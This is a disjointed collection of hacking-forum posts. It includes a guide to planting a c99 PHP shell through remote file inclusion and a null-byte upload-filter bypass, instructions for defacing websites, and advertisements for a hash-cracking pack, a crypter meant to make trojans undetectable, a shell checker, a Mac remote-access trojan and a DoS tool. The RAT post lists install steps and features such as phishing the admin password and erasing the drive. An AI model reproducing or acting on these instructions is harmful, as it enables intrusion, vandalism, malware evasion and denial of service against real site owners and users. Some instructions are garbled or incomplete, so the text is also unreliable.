The c99 shell is almost always used in remote file includes. That means that you get the remote server to 'host' the shell without any needing to upload it to take control over it. Read: RFI
A remote include works like this:
A website written in PHP includes files from a local directory. It usually looks something like this in the URL: "http://test.com/index.php?file=whatever" The part after the "?file=" is the locally included file. I'm really not going to get into how the RFI actually works, because it's beyond the scope of this. So, to include the file you would host it locally in a .txt and include it by doing : "http://test.com/index.php?file=http://yoursite.com/index.php?file=c99shell.txt?.php
(I can't quite remember how to run it via URL because it's been so damn long since I've done it. lol)
Now, what Clover was talking about is using a Null Byte attack. You just upload your shell via an upload form. Because most forms filter out certain extensions uploading .php is almost impossible. With a Null Byte attack though, it's made possible.
Now, lets take our usual picture upload form. This form filters out extensions such as .exe, .js, .php, .xml and so on and so forth. So if you were to try and upload C:\My Documents\shell.php it would return an error. The Null Byte works around this simple security measure because a Null Byte can be used as a string terminator. In simple terms, it tells the server where the string ends. Now, how it works. As we know, if we try to upload with a .php extension, we get returned an error. If we add a Null Byte to that string, with an acceptable extension we can bypass the extension check of the form. The Null Byte is represented in simple text for as "". So, back to the upload form we go. As we go to upload our shell "C:\My Documents\shell.php" we will add to the end of that a Null Byte along with an extension. Now it looks something like this "C:\My Documents\shell.php.jpg"
(extra info: Most forms now prohibit the use of special characters such as %,#,@,*,$ just for this reason. Forms now also prevent the clicking in the text area to prevent the addition of string terminators" and the like)
Now, the problem that I always ran into when I first started using Null Byte attacks was that I could never find where it went. It would upload fine, but I could never actually execute the shell. This was worked around by using HTTPLiveHeaders (firefox addon). Monitoring while I uploaded the shell would give me the exact location of where the file was stored. Copy the destination of the uploaded file and paste into the URL bar and everything would work out from there. Of course, that is if the person doesn't have a script to automatically check the extension again and assign the proper one, or if they use a script to copy, move to another destination, and delete.
Everyone got it now?
If all things go according to plan, your shell shall be uploaded and you can now take control.
Defacing a Site using a c99 shell
Okay first what is defacing? Well defacing is like you remove some contents of the site and show that it has been hacked by you. Defacing is a very good way of proving your a good hacker. Okay so lets get started
First you need a c99 shell, which can be easily found on google
Your antivirus might think its a virus but it isnt! Okay now you will need to find exploitable sites. Here are some ways to find it
That is one way of finding a c99 shell. See always upload a c99 shell with a .TXT or .JPG extension. You can change the extension but it wont change anything in the shell. I just leave mine as a c99.txt.
Another way of finding vulnerable sites is finding a random website that shows
On that page= you can put your shell so it would look like
credits To RiTaLiN
So today i decided to make a program like the following one i saw earlier.
But instead of just copying it exactly, i used a different encryption algorithm (polystairs) and different methods towards generating/compiling a code.
Im not sure what you would have use for this, but for me when ever i need a completely random string i will use this now :D prolly for some other things but yea. Hope you guys enjoy it! :D
UniCrack v1.0 [Download]
VirusTotal Detects 1/41
Ikarus T126.96.36.199.0 2011.04.22 HackTool.Win32.VB.jz
not really sure why ? false positive tho feel free to Sandbox / Virtual Machine your heart out.
Pack Contains :
[√]MD5 Crack Fast
Ultimate Distributed Cracker
Last Bit Md5 Password Cracker
Virus Scan - Analysis etc
Please leave feedback/say thanks if you have downloaded it.
his crypter makes ur trojan undetected
Never Upload @ virustotal use only NoVirusThanks.org
Hey, so here is an online shell checker
Please do not click the "submit" button more than once and WAIT for it to load
I have used Curl so it should be fast and reliable
This is made more for reliability more than speed
this scans about 100 links in about 15-25 seconds
Once you see the submit button disappear the scan has finished..
The working urls will be in the box
This is very good for people with slow internet because all the checks are done server-side, that means all you have to do is wait for the checks to be done. The webpage is very small so it doesnt take up much bandwidth at all!
http://hackguide4u.blogspot.com Have fun and please say thanks if you used it :)
Okay.. because some people have asked me "whats up with the next Version?" I will upload a Test-Version of the BlackHole RAT V2.
This Version is a little bit complicated to install and its untested!!
So what can you do with this Version?
- Execute Shell Comands remotly
- Chat with slave
- Read some Text on the slave Computer
- Display a Message
- Erase the HD
- Phish the Admin Password
- Block the Activity Monitor (after succsessfully phished Admin Pass)
- Shutdown, Reboot, Sleep and kill the Finder.app
What does this Version do?
- Adds itself to the Startup Items
- Is at the moment FUD
- Hidden From Dock, runs in background
What are the known Problems?
- Installation is a little bit complicated
- Server opens many Ports
- On every boot there will pop up a Window
- Server crashes when closing the Chat
- iSight Photo is not send complete
- ScreenShot function does not work in this Version
Okay now You know that all.. but this is only to show you what you can do with this on a Mac Computer. I will try to fix all Bugs and Problems as fast as I can.
1. Start the Install.command
2. Drag&Drop the Files asked in the Terminal Window
3. After Installation finished, close the Terminal and reboot
4. Connect with the Client
To use the Block Activity Window Function, do this:
1. Open the Block Script with Apple-ScriptEditor
2. Enter the slave Admin Pass where it says "enteradminpasswordhere"
3. Save as Programm named "Block"
4. Copy to /Applications/JavaUpdater/Data/Block.app on the Victims Computer
5. Now you can use the Block function with the Client
I hope you will like this.
Note: The Client works on Windows AND Mac.
Here are some pics:
And here is the Total Virus scan:
I hope you will like it;)
This easy DoS tool was made by Elixed_ in java.
Direct download: https://www.dropbox.com/s/v7vb8ikl47kd8wl/TeV%20DoS.rar
No idea why that moron virus scanner says that its a virus lol.
Created this almost a year ago, just found it at my old laptop and was like, why not post on HF.
It only go down for you when your own internet is shit. Else it will be down for everyone, it uses your internet connection.
For the people that really wants a screen: